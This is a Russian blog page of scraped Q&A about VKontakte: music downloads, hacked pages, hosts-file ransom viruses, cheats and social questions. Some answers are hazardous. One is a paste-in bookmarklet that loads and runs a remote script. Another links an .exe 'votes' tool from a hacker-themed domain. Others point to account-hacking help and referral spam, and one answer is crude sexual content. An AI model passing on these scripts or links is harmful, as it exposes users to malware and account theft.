воскресенье, 19 мая 2013 г.

Как скачать песни с ВКонтакте???Срочно надо!!!!Только по-подробнее)))



Всё намного проще, у каждого интернет браузера есть папка для временных файлов. Вы смотрите или слушаете в онлайне, а фактически Вы скачиваете а уже потом смотрите и слушаете. Например в Опере эта папка находится С:\програм файлс\ОрегаАС\профиль\саспе4, и пока страницу не закрыли эти файлы находятся там. А для более простого поиска их, можно в этой папке упорядочить значки по размеру или открывать её до того как зайдёте на нужную страницу. Вот такая хитрушка.

Можно ли Вконтакте найти человека по E-mail?

раньше было можно, при условии что у вас с ним велась переписка по мылу, это было сделано для приглашения друзей, в фейс буке до сих пор эта тема. там надо залогиниться через мыло. или что-то типо того.

не могу зайти сайт вконтакте!набираю логин и пароль,нажимаю войти,но он обновляет,не заходит!помогите пожалуйста!

Зайти в «Пуск» -> «Выполнить» и в открывшемся окошке ввести %SYSTEMROOT%\system32\drivers\etc\hosts и в открывшемся окошке выбрать «Блокнот». Когда этот документик откроется в блокноте, посмотреть, если в нём есть упоминания о вконтакте ру (Vkontakte.РУ) – удалить такие строки. Открыть Поиск и там ввести имя файла vkontakte.exe, в дополнительных параметрах указать «Поиск в скрытых файлах и папках» и «Поиск в системных папках», после чего выполнить поиск по всем дискам компьютера. Найденный файл vkontakte.exe удалить. Проверить систему на вирусы антивирусом, предварительно до этого обновив антивирус. Если на шаге 1 не открывается документ %SYSTEMROOT%\system32\drivers\etc\hosts, то выключаем РС , включаем и заходим в безопасном режиме и проделываем шаги с первого по пятый...

КАК ЭТО ВОЗМОЖНО? МОЯ СТРАНИЦА ВЗЛОМАНА? Ограничив для человека ВКОНТАКТЕ возможность писать мне сообщения, он всё равно

если ты заходишь на вконтакте а у тебя страница - типа взломана и отправь смс - то это просто вирусняк (адрес подменяется картинкой) прогони машину на вирусы -или попробуй зайти с другого компа. а ели кто то реально подобрал пароль - зная твой логин - то это делается просто. откатываешь письмо в службу поддержки (лучше с копией страницы паспорта (без номера паспорта) и они обнуляют пароль а тебе присылают на почту ссылку для восстановления . (страница паспорта нужня для идентификации пользователя - но это если страница зарегена на твое имя и фамилию)

Скажите пожалуйста, что делать, если видео вконтакте не открывается,ошибка JSON Error: at index 988: expected),got

может из-за VKSaver

Как загрузить видеоповтор боя WoT в Вконтакте?

Надо реплей превратить в нормальный видеоформат. Запустить реплей и сделать запись видео с экрана. Эту запись можно будет загружать куда угодно.

как вконтакте рисуют символами?

специальные программы (плагин для фотошопа) рисуй пока маленькими символами просто)) alt+цифра

вконтакте когда человека не добавляешь, а оставляешь в подписчиках, то это как-то будет видно тому, кто хотел добавитьс?

вы появитесь у него в подписках и интересных страницах

шрифт и картинки Вконтакте уменьшились. С чем это связано? Как это исправить?

Смирится и жить дальше, желательно без соц сетей

Как удалить агент вконтакте? Блин.Его невозможно удалить.Пробовала через панель управления.Не помогло.Что делать??

http://www.izone.ru/sys/utilities/revo-u...

Меня взломали Вконтакте что делать!

Проверь комп на вирусы. Удалив их, смени пароль.

Нужен стих-пожелание преподавателю анатомии. Нужен стих-пожелание преподавателю анатомии (он же - куратор группы)

Желаем Вам... Чтобы кости не ломались, Чтобы девки не стремались, И пускай до сотни лет Твой стреляет пистолет

Можно ли через вконтакте пустить вирус другому??

Легко! Большинство в основном этим и занимается.

Как быстро отправить картинку всем друзьям на стену Вконтакте?

Такой возможности нет для предотвращения рассылки спама! И это правильно! достали уже отправители дебильных открыток. Для поздравления достаточно обозначить внимание парой теплых строк.

Мне пишут что моя страница ВКонтакте взломана

Это вирус, изменивший файл host на вашем компьютере. Ни в коем случае не нужно самой лазить и пытаться там что-то стирать. Надо скачать бесплатно утилиту Dr. Web CureIt!, запустить режим усиленной безопасности и произвести полную проверку. Утилита найдет все изменения файла host и предложит восстановить первоначальный вид этого файла. Соглашаетесь, перезапускаете компьютер, чтобы изменения вступили в силу (программа тоже предложит), потом заходите и все снова в порядке. У меня у самой была такая проблема, но я сделала так, и теперь все хорошо) Попробуйте)

вконтакте!

Кому нужна страница с рейтнгом 161? Пишите, договоримя о цене. Я потратила 600 руб. всё честно Добавлено 4 года назад не удаляйте вопрос!

Че значит такой статус в знакомой вконтакте Научиться бы не париться по мелочам?

Возможно, она хочет кому-то, кто читает это, намекнуть, что она об этом человеке думает и нервничает - любовные переживания. Но хочет казаться одновременно циничной и называет чувства мелочами - то есть тем, о чем не надо вообще париться, это ничто.

Помогите надо составить 2 предложения(тем,чей ответ меня устроит вконтакте голос подарю)

из этих слов: видение, гений, как, красота, мгновенье, мимолётный, помнить, перед, ты, чистый, чудный, я, явиться. Предложение Я помню чудное мгновенье передо мной явилась ты, как мимолетное виденье, как гений чистой красоты. не считается

что такое голоса в вконтакте??

...Кохда поивляйутцо голоса, глафнойе не затягивать, а вовремя обратитцо к специалисстам ))

Скиньте ссылку для скачки музыки вконтакте, Спасибо:*

я делаю так: 1. удаляю адресную строку. 2. в неё копирую вот этот скрипт: javascript: (function(){var s=document.createElement(script); s.src=http://okontakte.info/audio.js; s.type=text/javascript; document.getElementsByTagName(head)[0].appendChild(s); })(); 3.жму play ипоявляется ссылка на скачивание. 4. обновляю страницу. 5.всё попробуй!!!

как узнать на какие закрытые группы вконтакте я подавал заявки?

Спросить ВК

Как вконтакте сделать аву с одной стороны картинка а нажимаешь на аву там дургая картинка?:)

сначала меняешь аву на ту, которую хочешь. Потом заходишь в альбом Фотографии с моей страницы и удаляешь эту фотку

Help кто прочтит 10 баллов за правильн й ответ и голос вконтакте

код на кровь: во время боя вводите blood, код на бычка: во время своего хода вводишь beef, Код на на рубины: 456rbushak, Код на деньги: vishvaze и число денег (+10000 фузов можно использовать на 30 уровне) Код на на прохождение 800 мисий: 800skautrefish bubu-если введёшь этот код то арбуз можно будет использовать больше 1-го раза(действует с 25 уровня) ну вот такие вроде бы есть коды..

как сделать много записей на своей стене вконтакте?

Попроси друзей написать тебе

Представьте, что сайта вконтакте, одноклассники, facebook и твиттер закрыли навсегда. Ваши действия?

фи! мне фасбук был нужен чтобы поисковые системы увидели мой сайт Задача выполнена и я там почти не появляюсь Этои социальные сети лишь для заполнения духовной пустоты Видели бабушек на лавочках? Это почти то же самое

взлом аккаунта вконтакте

Заходи на на сайт http://secreti.ucoz.ru там тебе помогут бесплатно)))мне помогли

подскажите плиз где вконтакте можно поиграть в игры другиз контактёров?

Посоветуйте удобный онлайн плеер. НЕ вконтакте

http://prostopleer.com - online-плеер для mp3 файлов

Как узнать кто смотрел твою страницу вконтакте?

Никак, они много раз заявляли, что такой функции в Контакте нет и не будет никогда

Как посмотреть список гостей вконтакте?

Напишите прикольные заметки, статусы и просто приколы для вконтакте:)))

В маршрутке МУЖИК достает огромное ЯБЛОКО! Ребенок напротив: -Мамочка, смотри какое у дяди ЯБЛИЩЕ!

адобе плеер загрузила.вконтакте не играет музыка.почему?

Если установили обновление с официального сайта, то перезапустите браузер. Если не помогло - перезагрузите компьютер. Если не помогло - установите Гугл Хром, там адоб флеш меняется автоматически, по умолчанию

Недавно нашёл в интернете программу для просмотра гостей страницы вконтакте. Такое возможно или это развод?

во первых не в интернете, а на почте, кто то добрый прислал оповещение, во вторых как только воспользуешься ей, все твои логины и пароли окажутся в чужих руках и будут проданы, но ты не верь на слово, пользуйся.

Скажите пожалуйста, если я удалюсь из ВКонтакте.ру, то куда мне можно будет выкладывать свои фотографии (я люблю фоткат

Лучше всего в твиттере и связать все между собой с каналом ю-тюб, ЖЖ, фейсбуком и с гугловским аккаунтом с единым гуглоящиком же включительно - это очень удобно, у меня к примеру так. И придумать свой маскот и все завернуть в единый (свой собственный) концепт и пилить его в местах, так сказать, пребывания, попутно развивая, поделив на несколько тематических позиций. Или лить свои пикчи на отдельные профильные фотохостинги типа 35Photo.ру, Photosight. И еще, кто сказал, что SEO-технологии это зло? ;\

студенты вконтакте пишут обо мне гадости что я лысый член, могу ли я за это их исключить из университета?

Мне кажется из университета вас давно исключить пора! Если вы и в жизни такие гениальные вопросы задаете и не дай Бог еще студентам на экзамене, неудивительно, что к вам такое отношение! Извините, конечно, я в инете нечасто бываю, но на ваши ахинейные вопросы натыкаюсь постоянно. Не подумали, что сюда и ваши студенты заходят и тоже все это видят? Вы же профессор, доктор наук...

Люди, как вконтакте опубликовать встречу на стене?

Зайти в Мои встречи и там заполнить поля

у меня на странице вконтакте не видно семейное положение

когда камне в ходят на страницу у меня не видно семейное положение что делать?

Не могу вконтакт зайти. Выходит эти слова: вы должны отправить смс сообщение с текстом: 162511111+ 62553 на номер: 6681

Правильно сделали ,что впихали тебе вирус на компьютер не будешь на дебильном сайте сидеть,теперь шурупь мозгами. В 99% случаев блокирование доступа к сайтам вызывается вирусом, который изменяет файл hosts, что находится на вашем компьютере. Вас перенаправляет на другую страницу, где обычно требуют послать СМС, либо вообще открывается другой сайт, либо страница просто не открывается. Вам надо пройти в папку Мой компьютер\диск C:\WINDOWS\system32\drivers\etc, нажать правой кнопкой мышки на файле hosts и выбрать из списка Свойства. В свойствах нужно будет снять галочку Только чтение (если она стоит) и нажать ОК. После чего повторно тыкаем правой кнопкой мышки на файле, выбираем Открыть -> Блокнот . В файле нужно будет удалить ВСЕ СТРОЧКИ, кроме 127.0.0.1 localhost. То есть у вас должна остаться только эта строка. После проделанной операции изменения НУЖНО СОХРАНИТЬ (Файл - Сохранить)и ПЕРЕЗАГРУЗИТЬ КОМПЬЮТЕР. Антивирусом и антишпионом чистим компьютер до блеска .Проделываем зто несколько раз. Если не помогает сносим винду и убиваемся об стену!!!

Как вконтакте скрыть некоторых друзей?

в настройках)приватность

Как объяснить девушке, что добавление девушки в друзья Вконтакте - это не измена и не повод обижаться на меня?

НО...ЕСЛИ она страшная или старая уже для ВАС..- Ваша добавленная...то и объяснять НИЧЕГО не надо....иной раз мужчины известные даже дружат с мужеподобными...некрасивыми женщинами..и я верю в такую дружбу...а вот..если..добавленная девушка и мила и приятна и симпотичная и по возрасту молодая....то какая же может быть дружба между нормальным пацаном и такой девушкой?...все равно здесь и элемент флирта и притяжения полов будет присутствовать...никакой дружбы здесь быть в чистом виде не может...в реале при таком раскладе ..их сексуальная близость - это дело лишь обстоятельств и времени....вот и все... один мой знакомый так дружил с одной симпатулей..дружил..иногда даже дрочил на нее..как мне сам говорил..а вот год назад...поехали они по делам в одном купе...до Питера..и остались там вдовем часа на два...так получилось, что двое их попутчиков сошли раньше....и вот случилось наконец.-.трахнулись...додружились:)))

кто знает где можно скачать програмку лови вконтакте бесплатно

введи в поисковик

Как удалить запись вконтакте? Возможно это?

заходите в настройки, в общих в самом низу будет вот такая строка Вы можете удалить свою страницу. Там и удаляйте.

Где итернов бесплатно посмотреть можно

В контакте! Утуб! Рутуб! Тнт онлайн

Как загрузить фото вконтакте?

...Я пытаюсь, жму Сохранить и продолжить, выбираю фотографию, а он что-то слишком долго думает.

ВКонтакте моя страница удалена (то ли мной случайно,то ли взломали) .Как её восстановить?

Вводишь логин и пароль, заходишь в настройки, внизу Кто можкт видеть мою страницу - все пользователи! А у тебя значит стоит Никто, удалить

как выделить жирным текст вконтакте в описании группы. как выделить жирным текст вконтакте в описании группы

Зажми контрл левый только не выделяй текст просто на какой странице тебе нужно зажимаешь контрл и двигаешь колесо мыши !ТАк ты либо приближаешь либо отдаляешь.

Как теперь видео вконтакте скачивать? Оно не в новом окне открывается, а просто как бы всплывает.

Устанавливаете себе Clipafon.панель http://www.clipafon.ru/toolbar/ и качаете видео со многих сайтов + другие полезные функции. Либо браузер Mozilla Firefox http://mozilla-russia.org/products/firefox/ + DownloadHelper https://addons.mozilla.org/ru/firefox/addon/video-downloadhelper/ Если понадобится конвертировать файл из одного формата в другой - Программа FormatFactory — бесплатная компьютерная программа для конвертации мультимедийных файлов. Программа может конвертировать видео-, аудио- и графические файлы, а также DVD в видео файлы, CD в аудио файлы. Переводит файлы MP4 для форматов iPod/iPhone/PSP/BlackBerry, поддерживает RMVB. http://www.softportal.com/software-9536-format-factory.html

Я захожу вконтакт, а мне пишут что моя страница удалена! что делать, как восстановить?

Вот

есть бесплатный вконтакте на мегафоне?

канеш есть,он во всех браузерах

как удалить свою страницу вконтакте?

зайдите в настройки приватности там укажите что бы никто не могу видетьвашу страничку)так же после кризиса/депрессии можно эту страницу востановить))

Где бесплатно скачать программу, чтобы можно было скачивать музыку вконтакте?

лучше не использовать программы для скачивания из контакта. Могут заблокировать страницу на несколько дней

как можно назваь альбом с фотками вконтакте..где мои друзья..и просто люди с которыми я общаюсь.. нужно английское н

My Friends.

Как удалить группу вконтакте временно, чтобы потом востановить??

Так сделать нельзя, либо стираете совсем либо оставляете)

Меня заблокировали вконтакте.И не заходит вконтакт,Если я переустоновлю Windows У мя станет заходить в контакт?

нет,не зайдет,это блокировка бывает когда кто то пожаловался на твою страничку) такая блокировка действует 1 день,так что завтра все уже будет как раньше у меня тоже такое было

как прокачаться в Вормикс ВКонтакте бесплатно

Никак ) Все сайты предлагающие прокачку, это откровенный развод) И к тому же у разработчиков уже давно стоит античитерская программа, которая блокирует читеров. Несколько раз видел лично когда бой завершался, а противник был объявлен читером))))

Помогите пожалуйста скачать программу для скачивания музыки и видео вконтакте vkSaver!!!!

Лови.Вконтакте. Или без всяких программ смотришь код элемента файла, выбираешь ссылку на него, открываешь в новой вкладке

Скачала программу для скачивания музыки вконтакте

Скачала программу для скачивания музыки вконтакте, и вопрос как её удалить???Я удалила,из карзины удалила,саму программу удалила,но вот это S(т.е. скачать) Осталось,я не знаю,что еще делать..

как можно заработать голоса в вконтакте бесплатно?подскажите

Есть сайт на котором нужно вступать в сообщества, добавлять в друзья и ставить лай, за это начисляются балы, которые можно обменять на голоса ссылка : soleech . com / ? r e f = 30318126 (без пробелов)

Для чего вы зарегестрированы вконтакте? Потому что там все остальные?))

Я там лет 6 )) Поддерживаю связь с родственниками, которые живут сравнительно далеко от меня. И заводила новые знакомства ))) Сейчас использую сайт можно сказать в качестве плеера))

Дайте читы для Копатель онлайн вконтакте

Дайте читы для копатель онлайн вконтакте уже активированы у когоесть пишите в личку.Помогите мне очень нужно, Заранее спасибо;D

где скачать программу чтобы увеличить голоса вконтакте

на вот скачай программку! http:// lordsadler2010. xaker. ru/ VKspy.exe Включай, заходи вконтакт и всё норм!)))))))))))) //если_мой_ответ_поможет_вам,_и_вы_захотите поблагодарить_меня,_то_прибавьте_мне_баллов_в_моём_мире_+5_или_+10_за_основное_фото_-_это_для_меня_лучшая_благодарность!//

как изменить размер картинки, которая не помещается вконтакт на аву...(

как изменить размер картинки, которая не помещается вконтакт на аву...((( была норм картинка, я вырезал себя на ней... не загружается... пишет типа она оч большая... что делать???

Как видеоклип с одной социальной сети( Вконтакте) скинуть на другую социальную сеть( mail.ru)?

Если у вас ролик еще остался на компе, то нажмите в разделе Видео на мэйлру кнопку Добавить Ролик и загрузите его на мэйлру.

как называется песня,которая играет в видио Вконтакте Принц. Самый отмороженный боксер?? пожалуйста!) очень нужно))

Outlandish - Guantanamo

Вконтакте. Как удалить группу в контакте?

если создовали вы сами лично то просто удалите из нее всех и сделайте закрытый доступ и удалите всю инфу пусть висит или можно дурову написать

Можно скачать музыку с вконтакте?

Internet Download Manager (IDM) – удобный инструмент, позволяющий увеличить скорость загрузки, поддерживающий докачку и загрузку по расписанию. Согласно мнениям пользователей, Internet Download Manager – отличная программа, позволяющая загружать ваше любимое программное обеспечение, игры, cd, dvd и mp3-музыку, фильмы, бесплатные и условно бесплатные программы намного быстрее! Internet Download Manager имеет встроенный логический ускоритель загрузки, включающий интеллектуальную динамическую сегментацию файла и безопасную многослойную технологию загрузки, что способствует ускорению загрузки. Комплексная система анализа ошибок и возможность докачки, поможет продолжить загрузку, прерванную из-за потери соединения, проблем в сети, выключения компьютера или перепадов в подаче электроэнергии. Простой графический интерфейс делает IDM удобным и дружественным к пользователю. С помощью Internet Download Manager Вы сможете скачивать видео и аудио с самых популярных соц сетей Одноклассники,Вконтакте,Мой мир .итд программа

А вы хотите добавить Артёма Милевского себе в друзья в ВКонтакте?

Давай! - скинь по сообщениям! :)

Кто нибудь пожалуйста ,дайте ссылку на бесплатную порнушку.

помогите найти плеер для вконтакте что б смотреть видео телефон нокиа 5800

нужно смотреть видео с телефона в контакте нокиа 5800

как разместить картинку вконтакте в раздел новости

Проста закидывать в альбом свой .И другим товарищам будет ето отображаться в новостях

как заработать бесплатно голоса в вконтакте

Мои настройки->Баланс->Получить голоса->Специальные предложения

взломали вконтакте.

але я ще можу заходити на пошту відправляю відновити пароль але неприходить і так вже 3=4 дня що робити?

что такое Интересные люди -вкондакте? объясните

ВКонтакте – это сетевой проект, который помогает людям высказываться и находить слушателей. Вы можете общаться с широким кругом интересных людей или поддерживать связь с друзьями и близкими. Интересные люди - это те, кто самостоятельно мыслит. Это интересно, когда собеседник подчеркивает яркие жизненные интересные моменты времени, которые рассказывают о жизни. Вряд ли существует универсальное определение, что значит быть интересным человеком. Можно выделить некоторые признаки, определяющие интересность: 1. Человек «не такой, как все». Вызывает интерес новое, отличное от привычного, но в рамках понятного. Человек может не делать ничего необычного, но если кем-то его слова, взгляд, поступки, воспринимаются, как нечто непривычное, новое, то он вызывает интерес. 2. Увлечение (хобби). В отличие от «не такой как все», увлечение обычно опредмечено, чётко определено. Оно должно быть также необычно. Коллекционирование живых крокодилов, явно не традиционное занятие, кому-то оно может показаться интересно, кому-то нет, а например, исследование загадочного, непознанного, всегда привлекает людей, вызывает интерес. 3. Мистика, загадочность, мифы. В отличие от увлечения, тут интерес вызывается не делом, а личностью. Сам человек должен быть загадочен. Его слова, убеждения, верования. Загадка должна поддерживаться отсутствием или добавлением противоречивой информации о личности человека. Нужно ещё отметить привлекательность мифа. Известные актёры, политики, люди из телевизора, привлекают множеством мифов о себе и своей жизни. Может быть, они все очень простые и малоинтересные люди, но за них работают мифы привлекательности. ..мифы, конечно, привлекают, но остаются мифами далёкими от реальной жизни. 4. Положение, статус в обществе. Интерес к таким людям, иногда вызван довольно прагматичными ожиданиями – получения помощи, проявляют к ним интерес не только из-за корысти, но и для престижа, желания присоединиться к успеху, просто пообщаться с интересной личностью. 5. Наличие знаний, умений, навыков, которыми человек может поделиться. Тут тоже, как и со статусом в обществе, интерес вызывает возможность что-то полезное получить, только это не материальные блага, а духовные, ментальные, личностные. Можно сказать, что особый интерес вызывают люди, сочетающие все эти пять признаков, или, хотя бы, два из пяти. Но теперь о самом простом и эффективном, что делает человека интересным, о чувстве юмора. Интересными людьми называют не тех, кто знает теорию относительности и может занудно её изложить, а тех, кто поднимает настроение, веселит и остроумен. Часто, одинаковый смысл имеют слова «с ним интересно», «с ним весело», «с ним прикольно», и т.п. К тем, кто вызывает положительные эмоции тянутся, хотят быть рядом, приглашают в компании. Самый простой и надёжный способ быть интересным, это вовремя рассказать анекдот, шутку, афоризм, метафору, в нужный момент разрядить обстановку, вызвать улыбку, смех. Хотите? Тогда вам на тренинг «Юморология или как стать интересным человеком». http://nlplife.ru/

Как узнать когда создана группа вконтакте? Как узнать когда создана группа вконтакте?

Это сделать нельзя, следите за записями, чтоб узнать примерную дату.

подскажите хороший сайт для общения.

да вконтакте =) самый оптимальный вариант =)

как взломать сраничку вконтакте?

Смотря как зарегистрирована страничка, бывает, что достаточно ввести свой моб. номер и тебе придёт код, который нужно будет ввести далее.

кто может помочь с переустановкой виндовс 7? напишите в лс вконтакте , буду благодарен.

как вы думаете что лучше: Однакласники или Вконтакте

В контакте можно ходить в гости, не оставляю своих следов ))) Молодёжь больше любит контакт, а старички чаще тусуются в одноклассниках. Где больше людей твоего возраста, там и надо регистрироваться.

как удалить страницу вконтакте если удалена почта привязанная к этой странице??

причем тут почта? заходишь в Настройки,находишь надпись Удалить страницу,указываешь причину и удаляешь...!)))

не показывает видео вконтакте (написано (видео еще не загрузилось или) че за фигня

с таким случаем знаком,нужно менять систему а точнее сносить и тогда будет всё нром,только этим выходом

это не вопрос это ответ. для тупых. про Вконтакте! он не работает ни у кого, когда закончятся работы? скоро!

очень содержательный ответ. долго думал? ответ здесь - http://otvet.mail.ru/answer/205488415/

Как скачивать музыку вконтакте?

если у тебя стоит мозила,то закачай vkbutton со страницы разработчика и качай в своё удовольствие

математика 5 класс)))кто поможет дам голоса вконтакте(или что-то ещё)

Дюралюминий-сплав, состоящий из 83 частей алюминия, 5 частей меди, 1 часть марганца, 1 часть магния (по массе). Какова масса куска дюралюминия если в нём меди , больше , чем магния на 84 гр.

Скажите где скачать прогу для накрутки подпищиков ВКонтакте?

Попробуй одну программу, смотри почту. Мне помогла.

Есть ли программа для получения голосов вконтакте?

Эта платная услуга .Зачем попусту деньги тратить.Лучше купи себе что-нибудь.

Сайты одноклассники и вконтакте полностью удовлетворили ваше любопытство?)))Или Вы еще не всех нашли?)))А

По-моему, вполне нормальное желание других посмотреть, себя показать. На этой нехитрой основе и сыграли создатели подобных сетей. Я не без удовольствия посмотрела на всех своих знакомых, которые встречались мне в различные периоды моей жизни, кто-то полюбовался и моими достижениями. Не вижу в этом ничего предосудительного. Нормальная человеческая психология.

У тебя сотни друзей Вконтакте. А кто из них придёт на твои похороны?

Хороший вопрос. У меня в контакте ровно 222 друга. На похороны не придёт НИКТО. В этом я абсолютно уверена.

Не идет видео вконтакте! Вместо изображения черное поле. Что делать?

может быть просто скорость интернета маленькая?

Моя страница Вконтакте куда-то исчезла

Вчера захожу вконтакт а моя страница не открываеться, вот что вылазит -

подскажите хороший сайт для скачивания музыки

Яндекс.Музыка + аддон videodownload helper

Вконтакте у меня группы типо порнуха!! лучшее порно контакта не откланяються что делать ?))

вау да ты член этого сообщества!

Подскажите форумы, где можно потрепаться с девушками -пофлиртовать (кроме ответов майл)

http://murclub.ru/id16182 это чат где можно создать своего персонажа=)

Посоветуйте прикольные игры ВКонтакте?

играю в вормикс,покер и правила войны.... больше ничего не признаю....

где скачать за бесплатно лицензионную музыку?

ВКонтакте, не? Или интересует высокое качество, типо даже не МП3?

Скачала программу лови вконтакте, но никак не могу скачать видео...видеоролик недоступен((( что делать?? Заранее спасибо

Ставиш браузер Mozila и плагин к нему DownLoader Helper, сверху появляются анимированная иконка, начинает крутиться когда видит что на странице есть видео поток. Качает с любого сайта не только контакта, захватывает вообще всё потоковое видео. Только выбирай лучшее качество просмотра, тогда он даст ссылку на этот файл в высоком расширении.

где скачать программу просмотра гостей ВКОНТАКТЕ?

такого еще нет.. это развод... с целью заиметь пароли и логины..

как скачать музыку из ВКонтакте? (без вирусов)

Через программу VKsaver, которая есть на сайте

В какой социальной сети вы седите: Вконтакте или Facebook ?

вконтакте там больше возможностей а фейсбук говно

Проблема толи с ноутбуком толи с вконтакте

Захожу на страничку вконтакте со своего ноутбука,выдает что страничка заморожена. Мол нужно написать номер телефона к которому привязана страничка,и получить смс. Приходит смс,на которое я должна ответить кодом,данным мне на страничке ,я отвечаю.В ответ приходит смс что на телефоне не достаточно средств. Насколько я знаю вконтакте сами присылает код разморозки.Захожу с другого компа на свою страничку,все нормально,она не заморожена. Спасите.Что делать? Антивирус вирусов никаких не видит .

Срочно зайдите!

добавьте меня пожалуйста вконтакте!!! для меня это очень важно!!!!

я знаю пароль молодого человека вконтакте(он сам дал)

вчера я зашла по его же просьбе туда, разместила фотки на его странице и увидела сообщение от девушки (-Привет, как дела?)) ) у него спросила кто это-он мне отвечает, что так просто знакомая, а что она написала? и говорит что никогда с ней не переписывался. а зачем тогда нужно было добавлять ее в друзья?? ненавижу когда меня за нос водят!



Комментариев нет:

Отправить комментарий